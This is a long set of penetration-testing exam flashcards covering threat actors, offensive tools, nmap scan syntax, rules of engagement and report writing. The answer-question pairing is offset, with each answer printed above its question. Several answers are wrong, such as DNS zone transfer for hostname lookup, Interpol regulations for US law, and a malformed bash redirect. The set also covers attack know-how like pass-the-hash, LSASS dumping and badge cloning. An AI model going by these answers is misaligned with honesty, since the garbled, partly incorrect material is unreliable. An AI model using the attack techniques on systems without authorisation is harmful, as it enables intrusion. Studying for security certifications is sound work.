Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?
Malicious insider
Which of the following threat actors exploits the trust that has been legitimately granted to them by an organization to compromise that organization's information or systems?
Script kiddie
Which of the following threat actors is probably the least dangerous based on the adversary tier list?
Organized crime Nation-state actor
Which of the following threat actors typically have the financial resources and technical expertise required to develop their own extensive exploits? (Choose two.)
Script kiddie
Which of the following threat actors typically lacks the technical expertise to develop their own exploits and must rely on prewritten code downloaded from the Internet?
Script kiddie, hacktivist, malicious insider, organized crime, nation-state
Which of the following tiers of adversaries ranks threat actors, generally speaking, from least threatening to most threatening?
Sysinternals ProcDump
Which of the following tools allows an attacker to dump the LSASS process from memory to disk?
foremost FTK
Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.)
Findsecbugs YASCA
Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.)
AFL Peach
Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.)
Nikto
Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance?
Socat Twittor DNSCat2
Which of the following tools can be used for command and control?
Recon-ng Maltego
Which of the following tools can be used to automate open source intelligence (OSINT) gathering? (Select all that apply.)
at Task Scheduler
Which of the following tools can be used to automatically run tasks on a Windows system without your intervention? (Choose two.)
APK Studio APKX
Which of the following tools can be used to debug or decompile an Android executable? (Choose two.)
CeWL
Which of the following tools can be used to generate a wordlist?
WMI
Which of the following tools can be used to perform many data-gathering operations and can be used by malware to perform different activities in a compromised system?
A rainbow table
Which of the following tools can be used to restore the original plain text password from the hash of that password?
Piggybacking
Which of the following types of physical security attacks does a mantrap utilize?
Nikto W3AF
Which of the following utilities can be categorized as vulnerability scanners? (Choose two.)
CSRF or XSRF
Which of the following vulnerabilities can be exploited with the parameters used in the following URL? http://h4cker.org/resource/?password_new=newpasswd&password_conf=newpasswd &Change=Change#
The psexec module found in Metasploit (exploit/windows/smb/psxec), Windows Sysinternals, or Core Security's impacket suite
Which of the following would allow a penetration tester to execute arbitrary commands against a Windows target with either an open SMB share or a closed SMB share when providing authorized credentials?
Using SSHv1 instead of SSHv2 Using SSL 2.0 instead of TLS 1.2
Which of the following would be considered an unsecure service or protocol configuration? (Choose two.)
Targeting the CFO with an SMS attack
Which one of the following is an instance of a spear phishing attack?
CAPEC
Which open source research source is a community-developed common database that contains descriptions of commonly used cyberattack patterns?
CWE
Which open source research source is a community-developed common database that contains vulnerabilities and exposures associated with software in general instead of a specific vendor's product?
CVE
Which open source research source is a community-developed common database used by industry vendors worldwide to submit vulnerabilities and exposures associated with their products?
JPCERT
Which open source research source is maintained by the Japanese government and provides a dynamic summary of current security alerts and advisories?
CERT
Which open source research source is maintained by the U.S. government and provides a dynamic summary of the most frequent, high-impact types of security incidents currently being reported?
NVD
Which open source research source is maintained by the U.S. government's National Institute of Science and Technology and provides a summary of current security?
Full Disclosure
Which open source research source is published by the organization that produces the nmap utility?
NVD
Which open source research source ranks security vulnerabilities by their severity?
Nmap
Which open-source command-line tool is used for several penetration test-focused activities on both wired and wireless networks, such as surveying hosts for open ports, fingerprinting operating systems, and collecting service banners?
-oA
Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once?
Badge cloning
Which penetration testing technique uses a high-gain antenna to pull information from employee RFID access cards, which may then be copied later to blank cards for use by a penetration tester?
Impacket
Which penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB?
Searchsploit
Which penetration testing tool is a command-line search tool for the online Exploit-DB database of known exploits?
Metasploit Framework
Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization's network?
BeEF
Which penetration testing utility is focused on exploiting web browsers?
JTAG
Which physical hardware standard was designed to allow manufacturers to connect to completed embedded systems and printed circuit boards in order to facilitate debugging and other testing, but can be leveraged by attackers or penetration testers to obtain information or shell access to a given device to which they have physical access?
Fence jumping
Which physical penetration testing practice is used to obtain unauthorized access to an area that has been cordoned off and, in the broadest sense, effectively describes methods used to entirely bypass access control mechanisms?
Security guards
Which physical security mechanism introduces a human element to a physical penetration testing scenario and is one of many reasons to establish a solid pretext before beginning a physical penetration testing engagement?
Mantrap
Which physical security mechanism serves as an access control point by using multiple sets of doors, which can both prevent unauthorized access to an inner boundary and contain an individual attempting to breach security after they pass through the first door?
Kismet
Which popular tool is used for wireless discovery and offers many of the same features as airodump-ng?
UDP 161
Which port is used by the SNMP protocol?
20 21
Which ports are used by an FTP server? (Choose two.)
139 445
Which ports are used by the SMB protocol? (Choose two.)
Follow-up actions/retesting
Which post-report delivery activity is focused on executing any additional assessment work that may be desired by the client or required based on terms defined in the engagement's statement of work?
Debriefing/closing meeting
Which post-report delivery activity is focused on identifying any patterns within the types of vulnerabilities discovered in an organization's networks during a penetration test, and the identification of broader knowledge that can be gained from the specific details of the penetration test results?
sudo
Which program can you use as a standard user on a Linux system to execute programs as root?
Lock bypass
Which range of techniques allows locksmiths and physical penetration testers to disengage a lock's latching mechanism without operating the lock at all, such as by opening a car door with a slim jim or using a thin metal shim to unlatch padlocks?
show modules
Which recon-ng command can be used to identify available modules for intelligence collection?
-ge
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other?
-gt
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other?
-le
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other?
-lt
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other?
>=
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other?
>
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other?
<=
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other?
<
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other?
ncat
Which remote access tool was created by the organization that developed nmap as an updated version of the netcat utility that supports encrypted data tunnels?
Appendixes
Which section of a penetration test report consists of supplemental material that is related to the report but is not critical for the purposes of understanding its contents? Examples may include nmap scan results, automated scan output, or other code written or deployed in the course of the penetration test.
Methodology
Which section of a penetration test report details broad, strategic information about testing techniques and practices used as well as the decision-making processes that guided information collection, analysis, and risk evaluation?
Findings and remediation
Which section of a penetration test report details discovered vulnerabilities, explains the risk they carry, and provides appropriate recommendations to secure the system in question?
Executive summary
Which section of a written report of penetration test findings is intended to be read by less-technical audiences?
Directory transversal
Which security misconfiguration on a web server would allow an end user accessing the site with a web browser to navigate through the web server's file system?
Cookie manipulation
Which security misconfiguration would allow a script run by the user's web browser to write data to a client-side cookie?
WPS
Which security standard was designed to simplify the connection process for consumer devices and home wireless networks but is vulnerable to remote attack if the PIN feature is enabled (default setting on many home routers) or local attacks if the wireless access point is not kept physically secured?
Phishing
Which social engineering attack vector may broadly be considered a remote attempt to elicit information or a desired action, but also necessarily includes technical components such as spam, web filter, and firewall evaluation?
Interrogation
Which social engineering technique involves questioning an employee using intimidation to gather information?
Interrogation
Which social engineering technique is least likely to be used during a penetration test?
Shodan
Which static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process, and can greatly aid penetration testers in the data-mining process?
Architecture overview
Which step in Microsoft's published guidance on threat modeling consists of documenting the technologies in use in the architecture of an information systems environment and discovering how they are implemented therein?
Beacon frame
Which subtype of management frame contains details about a wireless access point (including but not limited to the SSID, encryption details, MAC address, and Wi-Fi channel) that can enable a malicious agent to eavesdrop on a wireless network?
Architecture diagram
Which support resource details an organization's network or software design and infrastructure as well as defines the relationships between those elements?
Serial console
Which system access method is typically used by systems administrators to interact with systems that are locked up or unresponsive over the network, but can often be leveraged by an attacker with physical proximity to a system to obtain information or reset system passwords, such as by rebooting a Linux server into single-user mode?
DNS zone transfer
Which technique is used during passive reconnaissance to map a user-defined hostname to the IP address or addresses with which it is associated?
Deauthentication attack
Which technique is used in attacking wireless access points or the devices connecting to them, forcing client devices to disconnect from a network momentarily?
Tailgating
Which technique used in physical penetration testing aims to obtain unauthorized access to a secured location, frequently by exploiting the helpfulness or kindness of legitimate employees?
Vulnerability mapping
Which term describes the process of detailing identified security flaws and their locations?
Bluesnarfing
Which term is used to describe attacks that leverage a device's Bluetooth connection to steal information?
Rooting Jailbreaking
Which terms describe the process of enabling low-level execution of user applications with elevated privileges in mobile environments? (Choose two.)
Script kiddie
Which threat actor is most likely to be motivated by a desire to gain attention?
Hacktivist
Which threat actor is most likely to be motivated by a political cause?
APK Studio
Which tool for Android is a reverse engineering framework with a graphical interface, code editor, and an APK signing feature that allows users to modify and repackage code as needed?
Dradis
Which tool included in Kali is most helpful in compiling a quality penetration testing report?
MobSF
Which tool is an all-in-one, automated penetration testing framework for mobile applications for Android, iOS, and Windows mobile platforms, providing SAST for Android, iOS, and Windows mobile devices and DAST for Android platforms?
reaver
Which tool is used specifically to attack WPS-enabled networks, exploiting a weakness in WPS that enables attackers to brute-force the PIN used to obtain a WPA password?
Red team
Which type of assessment is marked by a longer-than-typical engagement time and significant risk or cost to the organization without effective expectation management?
SSL stripping
Which type of exploit fools a web server into presenting a user's web browser with an HTTP connection instead of an HTTPS connection as the user originally requested?
Single-factor authentication
Which type of finding weakens overall security posture by reducing the difficulty of compromising legitimate user credentials?
Weak password complexity requirements
Which type of finding weakens security posture by leaving user passwords more susceptible to cracking or online brute-force attempts?
Gray box assessment
Which type of penetration test best focuses the tester's time and efforts while still providing an approximate view of what a real attacker would see?
Black box assessment
Which type of penetration test best replicates the perspective of a real-world attacker?
Black box
Which type of penetration test best simulates an outsider attack?
Black box
Which type of penetration test requires the most time and money to conduct?
White box assessment
Which type of penetration test usually provides the most thorough assessment in the least amount of time?
FTP:14147
While footprinting an organization for a penetration test, you discover that a service it relies on uses FTP across port 14147 for data transfers. How could you refine a Shodan search to only reveal FTP servers on that port?
CeWL
While performing a black box penetration test, the tester wants to crawl the target organization's website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file?
Capture the FTP traffic with a sniffer.
While performing a black box penetration test, you identify a significant amount of FTP data being transferred between an unknown internal host on the target network and hosts on the Internet on ports 20 and 21. How could you exploit this traffic to gain access to systems on the target network?
The internal system administrator isn't paying attention to this server.
While performing a black box penetration test, you notice that the target organization has a public-facing server that has an expired SSL/TLS security certificate. What could you infer from this fact?
Research the Common Vulnerabilities and Exposures (CVE) database.
While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You've fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization's wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do?
Pass the hash
While performing a gray-box penetration test, the tester discovers that several Linux workstations in the network have not been joined to the organization's Active Directory domain, even though they have the Samba service installed. To access shared folders on Windows servers, these workstations use NT LAN Manager (NTLM) connections. The tester captures hashed user credentials as they are passed between workstations and servers and then reuses them later to establish new authenticated sessions with the file servers. What is this exploit called?
Remove all users created during testing phases Record all activities performed on a compromised system
While performing a penetration test, you are successful in compromising a system you are testing and are able to create your own user on the system. What actions should you take during and after the test to address post-engagement activities? (Select all that apply.)
CVE
While performing enumeration and fingerprinting during a gray box penetration test, you discover that the documentation and training department in the target organization stores its files on a Windows Server 2003 system that is still at the SP2 patch level because nobody bothers to update it. You want to investigate ways that this older server can be exploited. Which open source research source could you use?
A description of what kind of report will be provided to the client when the test is complete A remediation timeline that provides an estimate of how long it will take to bring their systems into compliance
While planning an upcoming penetration test, your client has requested that you include a description of the end state of the assessment in the project scope. What kind of information should be included in this description? (Choose two.)
Badge cloning
While waiting in line at a food truck behind an employee of the target organization, a penetration tester steals her access badge and makes a copy of its RFID signature on a fake access badge. What is this technique called?
Implementation of patching and change control programs
While working on a penetration test report for a client organization, you note that there were numerous discrepancies in software package versions installed on business-critical servers. How might this issue best be mitigated?
Search for additional personnel with experience in enterprise-level information security and network architecture
While working on a penetration test report, you note repeatedly that security best practices are often not enforced, and that there seems to be no overarching design philosophy with regard to organization or network expansion. Which of the following would be an appropriate mitigation strategy to recommend for this scenario?
Deploy a hardware firewall to prevent unrestricted movement in the network Enforce network segmentation
While writing a penetration test report, you note that security monitoring by the client seems to revolve around SMS alerts driven by log aggregation. Issues logged seem well tended but you further note that you did not have any issue moving laterally in the environment, as you did not encounter any network segregation or network flow control measures. Which of the following would be good recommendations for mitigation of these issues? (Choose all that apply.)
A timeline for the engagement A review of laws that specifically govern the target
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements must be included? (Choose two.)
To avoid taking down a system or service through effectively running a denial-of-service attack, or to avoid detection by not tripping log sensors or other alerts
Why might it be necessary to throttle queries to a target system during a penetration test?
Single-factor authentication reduces the complexity of obtaining access to a target system. Multifactor authentication often is required by compliance guidelines.
Why should multifactor authentication be used and encouraged instead of single-factor methods? (Choose all that apply.)
They transmit data as clear text over the network.
Why should you avoid using utilities such as Telnet, rlogin, and rsh when conducting a penetration test?
The penetration tester is only provided with initial, basic connectivity to target systems.
With respect to penetration testing conducted behind perimeter defenses, what does it mean to be provided limited access?
tail /var/log/firewall 1> lastevents 2> &1
Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this?
Technology
You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. The organization might also filter out any messages containing high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?
A man-in-the-middle attack
You and a colleague are discussing different types of attacks that can take place. One type of an attack is where communications between two parties are intercepted and forwarded and neither party is aware that an interception even took place. What type of attack is being discussed?
Cross-site scripting (XSS)
You and a colleague are discussing different types of attacks. One such attack is a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser. What type of attack is this describing?
Computer Emergency Response Team (CERT)
You and a colleague are discussing open source intelligence (OSINT), and the discussion leans toward discussing vulnerabilities and other security flaws. There are a number of organizations that work to centralize this knowledge. One of these organizations tackles a broad range of cybersecurity activities. It focuses on security breach and denial of service incidents, providing alerts and incident-handling and avoidance guidelines. Which organization are we discussing?
The Common Attack Pattern Enumeration and Classification (CAPEC)
You and a colleague are discussing open source intelligence (OSINT), and the discussion leans toward discussing vulnerabilities and other security flaws. There are a number of organizations that work to centralize this knowledge. One of these organizations uses a list as a resource intended to help identify and document attacks and attack patterns. It allows users to search attacks by their mechanism or domain and then breaks down each attack by using various attributes and prerequisites. Which organization are we discussing?
Time of check to time of use (TOCTTOU)
You and a colleague are discussing race condition exploitation. Which one of the following is an example of race condition?
Something you have
You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?
The removal of any tools used The removal of shells The removal of tester-created credentials
You are a penetration tester and are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)
Setting up a schedule of testing times to access their systems
You are a penetration tester and are discussing with a client the properties of the testing engagement agreement. Which one of the following will have the biggest impact on the observation and testing of the client's production systems during their peak loads?
Certificate pinning
You are a penetration tester and have been asked to test an organization that uses an authentication method that associates hosts with their public keys. What type of authentication technique is the organization using?
Credentialed scan
You are a penetration tester and have been scanning a network. The vulnerability scanner that you are utilizing is using a service access level to better evaluate vulnerabilities across multiple assets within an organization. What is being performed?
Attempt RID cycling to enumerate users and groups.
You are a penetration tester and have found a vulnerability in the client's domain controller. The vulnerability is that null sessions are enabled on the domain controller. What type of attack can be performed to take advantage of this vulnerability?
The organization did not disable Telnet.
You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this?
The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack?
$ports = 20, 25, 80, 443
You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use?
Scope creep
You are a penetration tester, and a company has asked you to perform a web application penetration test. The company has asked you to discover any vulnerabilities. The company has now come to you and asked if you will review additional code and check for updates to firewall settings. What is the client asking you to do?
Expand the password length from seven to 14 characters and add special characters.
You are a penetration tester, and after performing a recent test, you discover that the client's staff is using dictionary and seasonal passwords. What is the best way to control the use of common dictionary words as being used as passwords?
HKEY_CURRENT_USER
You are a penetration tester, and while conducting a test, you are trying to maintain persistence on a Windows system that has limited privileges. What registry key should you use?
During lessons learned
You are a penetration tester, and while doing a cleanup after a penetration test, it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?
A full scan
You are a penetration tester, and you are conducting a black box penetration test against your client's network and are in the process of gathering vulnerability scanning results. What type of scan will provide you with important information within the scope of your testing?
Sqlmap
You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you?
A read-only account
You are a penetration tester, and you are configuring your vulnerability management solution to perform credentialed scans of servers on your client's network. What type of account should you be provided with?
Findings can assist an attacker in compromising a system.
You are a penetration tester, and you are discussing with the client the importance of maintaining confidentiality of any findings when performing a penetration test. Why is it important to maintain confidentiality when performing penetrations tests?
To run it on different architectures
You are a penetration tester, and you are looking to cross-compile code for your penetration activity. Then you plan to deploy it. Why would you cross-compile code?
A session cookie
You are a penetration tester, and you are looking to start a session hijacking attack against a client's web application. What information is important to obtain to ensure that your attack will be a success?
The service set identifiers (SSIDs)
You are a penetration tester, and you are performing an on-site penetration test. What scoping element do you need to know for a wireless assessment when working on-site in a shared building?
CeWL
You are a penetration tester, and you are planning to create a custom wordlist of common words and catchphrases about your client using the client's website. What is the name of the tool that you can utilize to assist with building a custom wordlist?
They should disable any unnecessary services.
You are a penetration tester, and you have been asked by a client to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?
TCP SYNs to TCP port 80
You are a penetration tester, and you plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see when you use this script: hping remoteclient.com -S -V -p 80?
Mimikatz
You are a penetration tester, and you want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire?
Impacket
You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use?
Censys
You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this?
Shodan
You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this?
Red team assessments
You are a penetration tester. You are looking at the type of penetration test that is not meant to identify as many vulnerabilities as possible but instead concentrates on the vulnerabilities that specifically align with the goals of gaining control of specific systems or data. What type of assessment are you looking at running?
Any additional rates
You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration?
Include all the technical detail pertaining to the testing.
You are a security analyst, and you have just completed a penetration test. What item would not be appropriate when writing an executive summary?
Ask a member of senior management to sign a document granting you permission to perform the test.
You are arranging the terms of a penetration test with a new client. Which of the following is an appropriate way to secure legal permission to conduct the test?
Interpol regulations
You are asked to perform a penetration test for an organization with offices located in New York City, Los Angeles, and Fargo. Which cybersecurity laws and regulations do you need to check as you scope the assessment?
Grey box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "partial knowledge" test of their network. Which type of penetration test should you perform?
Map vulnerabilities present in the older Linux servers to possible exploits.
You are assessing the results of a vulnerability scan and have made an observation. You have found that the organization has many Linux servers deployed that still run on a distribution that was released in 2008. What should you do?
Investigate whether this creates any vulnerabilities that you could exploit. Document the common theme of missing updates in the final penetration test report.
You are assessing the results of a vulnerability scan and have noticed a common theme. You have found that almost all of the target organization's Windows Server 2012 R2 systems are missing the same critical security updates. What should you do? (Choose two.)
Recommend that the client adopt a best practice of changing all default usernames and passwords. Exploit the devices that are using default usernames and passwords.
You are assessing the results of a vulnerability scan and notice that many network devices, such as routers and access points, still use default administrative usernames and passwords. This information can be easily found on the Internet and represents a significant security vulnerability. What should you do? (Choose two.)
Goal reprioritization
You are conducting a PCI DSS penetration test for a client. During the testing process, a dangerous ransomware exploit begins to spread between networks around the world. The client asks you to halt the PCI DSS penetration test and instead test to see whether their network is vulnerable to this new type of malware. Which term best describes what happened in this scenario?
Stages
You are conducting a black box penetration test for a client. The enumeration phase of the test is complete, and you are ready to begin exploiting vulnerable systems. Before doing so, you communicate with the client and inform them that test is transitioning. Which type of communication trigger was used in this scenario?
Stages
You are conducting a black box penetration test for a client. The reconnaissance phase of the test is complete, and you are ready to move on to the next phase. Before doing so, you communicate with the client and inform them that test is moving from one phase to another. Which type of communication trigger was used in this scenario?
Stages
You are conducting a black box penetration test for a client. The test is now complete, and you are ready to begin cleaning up after yourself. Before doing so, you communicate with the client and inform them that the test is complete and to be aware that cleanup activates will be occurring. Which type of communication trigger was used in this scenario?
Phishing
You are conducting a black box penetration test for a client. You have used reconnaissance tools to create a list of employee email addresses within the target organization. You craft an email addressed to all of the employees warning them that they must change their password within 24 hours or they will lose access. When they click the link provided in the email, they are redirected to your own website where their credentials are captured to a text file. What kind of exploit did you use?
Critical findings
You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?
You are attacking wireless networks that are out of scope.
You are conducting a black box penetration test for client. The client leases its office space in a building shared with other tenants. You are sitting in your car in a parking lot in front of the client's offices scanning for wireless network signals emanating from the building. You have identified five separate SSIDs. You don't know which one belongs to your client, so you decide to clandestinely connect to all of them and then run some simple scans to isolate which one is your client's wireless network. What did you do incorrectly in this scenario?
Critical findings
You are conducting a gray box penetration test for a client. During the test, you discover that help desk technicians are using authenticated but unencrypted FTP connections over the Internet to transfer files to computers located at remote branch-office sites. As such, their credentials are potentially being exposed on the public network. Even though this represents a tempting target for you to exploit, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that privileged credentials are potentially being exposed on the Internet. Which type of communication trigger was used in this scenario?
Critical findings
You are conducting a gray box penetration test for a client. During the test, you discover that many users' Windows desktop systems haven't been patched properly and are still vulnerable to several common types of ransomware. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their systems are vulnerable. Which type of communication trigger was used in this scenario?
Goal reprioritization
You are conducting a gray box penetration test for a client. During the testing process, you notice that their wireless network uses weak encryption with a preshared key (00000001) that is easy to brute-force crack. Further, you notice that client has implemented omnidirectional access points throughout the facility. You suspect that the wireless signal is emanating far outside the building. You contact the client and recommend that the test be modified to include testing of the Wi-Fi network from a black box perspective. Which term best describes what happened in this scenario?
nmap 192.168.1.1 -A
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this?
Black box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "zero knowledge" test of their network. Which type of penetration test should you perform?
nmap 192.168.1.1 -O
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this?
nmap 192.168.1.1 -sS
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sS nmap 192.168.1.1
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.)
nmap 192.168.1.1 -sA
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sT
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sU
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this?
nmap 192.168.1.1-254 -p 23
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open. Which command should you use to do this?
nmap 192.168.1.1-254 -sn
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this?
nmap 192.168.1.0/24 -sL
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?
nmap 192.168.1.10-13 -sA
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this?
nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this?
nmap 192.168.1.2 -p-
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this?
The Telnet service is installed but not running.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? (Choose two.)
The Telnet service is installed and running, but a host firewall is blocking it.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean?
The Telnet service is installed, running, and accessible.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean?
DNS poisoning
You are conducting a gray box penetration test. You want to capture C-level executives' authentication credentials. To accomplish this, you set up a fake internal web server that looks exactly like the web server used to manage employee time-off and reimbursement requests. You inject a fake DNS record into the organization's DNS server that redirects traffic from the real server to your fake server. What is this exploit called?
Compliance-based assessment
You are conducting a penetration test of an organization that processes credit cards. The client has asked that the scope of the test be based on the PCI-DSS standard. What type of assessment is occurring in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you discover a hidden backdoor administrator account on one of the client's Active Directory domain controllers. You check the logs of the domain controller and find that the backdoor account is being actively used on a daily basis. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their server has been compromised. Which type of communication trigger was used in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you notice outgoing network traffic consistent with a distributed denial of service (DDoS) attack. You suspect that internal systems have been infected with malware, creating an amplifier network for the attack. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you notice that all end-user workstations are configured with only the default Windows antivirus scanner. You further notice that many end users use an application to complete their daily work that is a known Trojan horse commonly used to create a botnet. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?
nmap 192.168.1.0/24 --exclude 192.168.1.250
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this?
nmap 192.168.1.0/24 nmap 192.168.1.1-254
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.)
Scope creep
You are conducting a white box penetration test. The scope of test specifies that the test will be conducted against the organization's switches, routers, and firewalls. As the assessment is nearing completion, the client asks you to use the time remaining to also test her email servers. What has occurred in this scenario?
Remove any tester-created credentials used during the test.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
Remove any tools or utilities you installed during the test.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
Remove any shell sessions created during the test. Document everything you do during the cleanup.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do? (Choose two.)
The ROE should include written permission from senior management.
You are defining the rules of engagement (ROE) for an upcoming penetration test. During this process, you have defined off-limit times when you should not attack the target, a list of in-scope and out-of-scope systems, and data-handling requirements for the information you gather during the test. You also phoned one of the help-desk technicians at the target site and received verbal permission to conduct the test. You recorded the technician's name and the date in the ROE document. What did you do incorrectly in this scenario?
Having detailed information about the internal network invalidates the results of the test.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a black box assessment. The client has specified that they do not want the test to be conducted during peak times of the day, so you added "timeout" time frames to the document when testing will be suspended. You have specified that no communications will occur between you and the client until the end of the test when you submit your final test results. You have also specified that the target must provide you with internal access to the network, a network map, and authentication credentials. What did you do incorrectly in this scenario?
You will have limited network access. You will have limited storage access.
